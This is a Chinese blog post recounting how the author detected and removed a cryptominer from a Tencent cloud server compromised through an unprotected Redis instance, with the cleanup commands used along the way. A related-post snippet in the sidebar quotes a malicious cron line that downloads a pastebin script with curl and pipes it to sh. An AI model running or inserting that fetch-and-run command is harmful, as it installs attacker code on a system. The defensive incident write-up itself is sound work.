记一次腾讯的云服务器被植入挖矿程序的历程

最新推荐文章于 2024-05-30 14:50:09 发布
最新推荐文章于 2024-05-30 14:50:09 发布
阅读量1.8k 收藏 11
点赞数 4
分类专栏: LInux 服务器 redis 文章标签: redis被杀掉 redis无故消失 redis进程消失
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42184538/article/details/100717686
版权
LInux 同时被 3 个专栏收录
16 篇文章 0 订阅
订阅专栏
服务器
7 篇文章 0 订阅
订阅专栏
redis
1 篇文章 0 订阅
订阅专栏

不幸中的三生有幸…在19年9.10教师节的晚上,在我购买的云服务器上发现了这个挖矿程序…略有点刺激…故事是这样的~

#最近写了一个小程序,在购买的乞丐版腾讯云服务器上跑起来了tomcat、redis、mysql…
#怪事就这样开始了…
#先是redis莫名其妙被杀掉
#接下来tomcat也莫名其妙的被杀掉
#redis怎么启动不出10min,他就悄无声息的没了…很神奇,日志也没有被杀掉的记录…
#查看oom killer的日志也没有…难道累了自刀了?显然不可能…
#我又寻思难道是java里设置的最小空闲连接数量问题?(此时已经进入无脑的瞎蒙状态)显然怎么改依然无济于事…Orz…
#凌晨了,此时超级安静的环境下,一股力量让我敲下了

top

此时
在这里插入图片描述
其中一条sysupdate的进程引起我的注意,耗费cpu高达98.0(截图的时候略有减少),MMP…这TM什么鬼(罗辑思维有一集说得好:脏话促使了文明发展。若不通过脏话抒发内心的疑惑和悲愤,可能一晚上都要郁郁寡欢了…)
果断

ps -ef | grep sysupdate   //查到sysupdate对应的PID

ls -l /proc/{pid 号}/exe  //获取绝对路径

在这里插入图片描述
发现 sysupdate 的绝对路径在 /etc下 /etc/sysupdate
将此文件下载到本地,并上传到 VirusTotal:https://www.virustotal.com/
在这里插入图片描述
#妥妥的有问题…
开始干掉他…

(1)杀进程

kill -9 PID号

(2)删文件

rm -rf sysupdate

此时报错
在这里插入图片描述
是因为该程序使用了 chattr +i 的命令,我们执行

chattr -i sysupdate

然后再次rm -rf就可以删除了

(3)清除残留

不出10min左右,会发现文件及进程又出现了,是因为有潜藏的定时任务
通过

crontab -l


cat /var/spool/cron/root

查看定时任务
在这里插入图片描述
清理定时任务

crontab -r

(4)秘钥文件处理

通过

ll -a   //查看所有文件包括隐藏文件,找到.ssh

找到/root/.ssh/authorized_keys文件,此文件修复或是删除(修复方法网上有很多,后期我在整理在这)

(5)其他修复建议

a)断网、备份重要的crontab,关闭或删除定时任务:systemctl stop crontab或 rm -rf /etc/cron.d/*;(大小一般为182)
在这里插入图片描述

b)查看并杀掉病毒进程:同时杀掉sysguard、networkservice、sysupdate三个进程;

d)重启服务器,安装漏洞补丁。

(6)大功告成,此时暂告安全

总结:
redis在linux中配置好并运行起来前,**一定要!一定要!一定要!**配置好redis.conf中的bind,绑定本机以及允许访问的机器,否则你的服务器的redis会立即暴露在全球的眼皮底下,秒秒钟会被其他人或是运行的程序扫描到并且立即植入挖矿程序,你的服务器就成为别人的肉鸡了。切记!一定要配置好绑定IP!
悟空宇
关注
  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
排查腾讯云服务器挖矿病毒【pnscan】挟持
fanxindong0620的博客
09-27 6415
一、问题发现 最新在使用腾讯云部署项目应用,具体方式为docker部署,今天早上起床发现腾讯发来一条报警信息: 二、排查过程 使用last查看最近登录信息 使用history查看历史指令 查看/etc/passwd下的账户信息 查看日志文件/var/log/secure和/var/log/message 使用top查看进程运行信息 使用netstat查看端口信息 三、解决方案 ...
基于腾讯云服务器部署微信小程序后台服务(Python+Django)
09-19
主要介绍了基于腾讯云服务器部署微信小程序后台服务(Python+Django),小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
腾讯云服务器植入pnscan挖矿病毒折磨的一天
weixin_61077098的博客
06-06 764
pnscan病毒非常狡猾,启动的进程号是动态的,导致不能轻易删除。还有文件删除后没多久又出现了多半是因为定时计划。虽然问题解决了,但并不知道服务器还有没有被修改的命令和一些恶意文件,如果不是很重要的服务器项目,建议备份数据重装服务器,并且不能轻易的把端口号防火墙放开,MySQL、redis等密码也要加大难度。2023年5月22日,建议大家直接重装系统,或者备份的镜像快照回滚。因为今天又出现30多次黑客的攻击,cpu直接100%,根本查不到恶意文件和进程号。所以直接重装!!!
一次使用腾讯云服务器疑似被挖矿的经历及排查办法
最新发布
The_real_undertaker的博客
05-30 442
当然,最后没有解决掉我的问题,因为我发现压根从mysql找不到那个线程,所以直接怀疑mysql进程有问题,应该是有狗子用mysql用户启动了一个进程,然后我以为是mysql服务器的进程,实际上是一个挖矿程序,好吧,破案了。综上,我发现在云服务器上,不管是勒索,还是挖矿,都跟mysql有关系,所以一定得做好安全防护,已知的就有,mysql数据库密码高强度;当时使用了top命令,发现高占用的程序时mysql,cpu应该是100,命令是一个奇怪的数字。最后,我把那个占用高的进程咔嚓了。通过top命令找到pid。
腾讯云服务器被攻击使用的命令,gitlab因为没有设置redis密码导致被植入挖矿程序
阿俊的博客
04-24 407
cd /var/lib/docker/overlay2/73b322dfc2c40a458f3d9a0c5d1691bb3ca013adcb76431e5d759b82e3a2c4e1/merged/tmp 进入挖矿程序目录。ps -aux | sort -k3nr | head -5 查询最近运行的程序,其中包含了spreadtop。腾讯云服务器被攻击使用的命令,gitlab因为没有设置redis密码导致被植入挖矿程序。强烈建议关闭自带的redis,使用自有redis服务,参考。
云服务器植入挖矿木马,CPU飙升200%处理方案
weixin_55625082的博客
11-25 1918
云服务器植入挖矿木马,CPU飙升200%处理方案 1,通过执行top命令,即可在返回结果中看到当时系统的CPU占用率。 top -c 2.检查防火墙iptables规则中是否存在可疑端口 iptables -L -n 查看防火墙规则 vim /etc/sysconfig/iptables 清除防火墙中的可疑地址和 规则 iptables -A INPUT -s 可疑地址 -j DROP 删除入口方向可以地址 iptables
云主机被挖矿解决方法
qq_38472451的博客
08-22 3190
云主机被挖矿解决方法
关于云服务器挖矿病毒入侵这件事的经过
Innocence_0的博客
01-31 389
关于云服务器挖矿病毒入侵这件事的经过
腾讯云服务器安装python及运行程序方法.doc
07-24
自己跑深度学习代码太慢,于是网上租用了一台服务器,centos系统的,自己在网上查找了安装python3的方法,并成功跑出了自己程序的结果,该文档是我的总结,按照步骤直接运行不会出错
程序物体识别开发(腾讯云轻量云服务器搭建).zip
07-17
在本项目中,我们将探讨如何使用小程序进行物体识别,并通过腾讯云轻量级云服务器来部署相关服务。这个教程涵盖了多个技术领域,包括前端的小程序开发、后端的服务器搭建、深度学习模型的运用以及环境配置。以下是...
腾讯云小程序一站式解决方案
10-20
微信小程序源码,前端源码,简单展示源码,原生小程序源码 非uniapp,仅供参考,如有涉及版权问题请联系作者。微信小程序源码,前端源码,简单展示源码,原生小程序源码 非uniapp,仅供参考,如有涉及版权问题请联系...
程序源码 腾讯云小程序一站式解决方案 (代码+截图)
06-19
程序源码 腾讯云小程序一站式解决方案 (代码+截图)小程序源码 腾讯云小程序一站式解决方案 (代码+截图)小程序源码 腾讯云小程序一站式解决方案 (代码+截图)小程序源码 腾讯云小程序一站式解决方案 (代码+截图)小...
root账号设置文件权限失败原因 及解决方法
qq_36725627的博客
09-11 4518
root在修改相关文件java的属性的时候 chmod 777 java chmod: changing permissions of `java': Operation not permitted 首先先查看一下属性 lsattrjava ----ia-------- java 去除i这个属性 chattr -i java chattr -ajava chmod 777 java 添加...
云服务器挖矿 未解决
qq_40567146的博客
09-04 788
连接阿里云服务器发现很卡,top 显示不出高占用进程,cpu100%占用。 crontab -l  发现有定时任务: */30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 地址打开找不到源码,根据网上资料操作:vim  /etc/ld.so.preload   删除其中内容 后执行ldconfig 再使...
服务器被疑似挖矿程序植入107.174.47.156,发现以及解决过程(建议所有使用sonatype/nexus3镜像的用户清查一下)...
weixin_30824479的博客
04-28 300
  此次服务器被植入挖矿程序发现起来较为巧合,首先是上周三开始,我通过sonatype/nexus3搭建的仓库间歇性崩溃,但是每次重新start一下也能直接使用所以没有彻底清查,去docker logs里查看发现是执行bash命令和powershell命令出错,没有想明白是什么原因。   后来恰好ES更新7.0版本了,我一看“呦呵,7.0里面连type都没有了?”赶紧跟个风,于是把我运行很长时间...
腾讯云服务器遭遇kdevtmpfsi挖矿病毒
sunydayshine的博客
06-02 1134
登录到服务器后开始检查数据库数据,发现并没有被破坏,然后开始清理病毒,先使用top命令看到这个进程,然后将其kill掉,然后再去/etc/文件下找到了异常文件libsystem.so和kinsing,将其删除。一看就是在偷偷下载不怀好意的脚本文件,确定了这个ip不是我们机器,然后果断删除这个定时任务,然后又重复杀掉kdevtmpfsi进程,删除相关文件夹,机器终于恢复了正常。没一会儿的功夫的,监控发现cpu又打满了100%,然后我又开始重复的步骤,杀进程删文件,看来这个病毒并没有这么容易解决。
:解决腾讯云服务器程序被恶意登录植入进程
weixin_66934797的博客
02-08 1069
1.登录上服务器发先服务器非常卡,直接使用top -c命令检查进程CPU的占用率,果然发现了问题,看图./xrx 占用了200%的内存2.查看定时任务,是否有不明的定时任务①使用-l命令查看,没有发现不明定时任务②cat /etc/crontab,同样没有发现不明定时任务3.检查端口的状态有很多tcp和udp的连接4.第一次处理:强制杀死进程: kill -9 22865745.杀死进程查看CPU回归正常。
阿里云服务器挖矿问题
ltstud的博客
10-19 9519
下午发现服务器CPU: 12618 root      20   0  680m  17m 1280 S 699.9  0.1  72:13.24 wnTKYg  网上收索解决办法copy如下: 下面就讲解wnTKYg如何清除。最近项目在做性能测试,发现CPU使用率异常,无人访问时CPU也一直保持75%,然后在xShell上top了一下,发现wnTKYg这个程序CPU占用率3
一次苦逼的服务器被挖矿的清除过程
热门推荐
bobpen的专栏
02-21 2万+
环境说明 Centos 6.2 现象描述       通过top查看服务器资源,cpu资源几乎被占尽,但是top list里面却没有显示出是哪个进程占用的资源 而且系统会提示以下信息 通过关键字查询miner & crytonight,得知服务器被而已挖矿了 解决办法 1.linux进入single模式 进入singl
腾讯云服务器部署小程序
07-27
腾讯云服务器可以用来部署小程序。服务器是一台用于存储和处理数据的计算机,类似于本地的笔本电脑,但需要通过终端命令进行操作。购买腾讯云服务器可以选择适合自己需求的配置和价格。在购买服务器后,你可以将你的域名解析到腾讯云后台,并配置小程序后台以使用该域名。需要注意的是,小程序后台要求使用https协议,所以你可能需要进行相应的配置。 #### 引用[.reference_title] - *1* *2* *3* [部署小程序服务器从零开始(腾讯云)](https://blog.csdn.net/m0_64068722/article/details/121317092)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

悟空宇

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值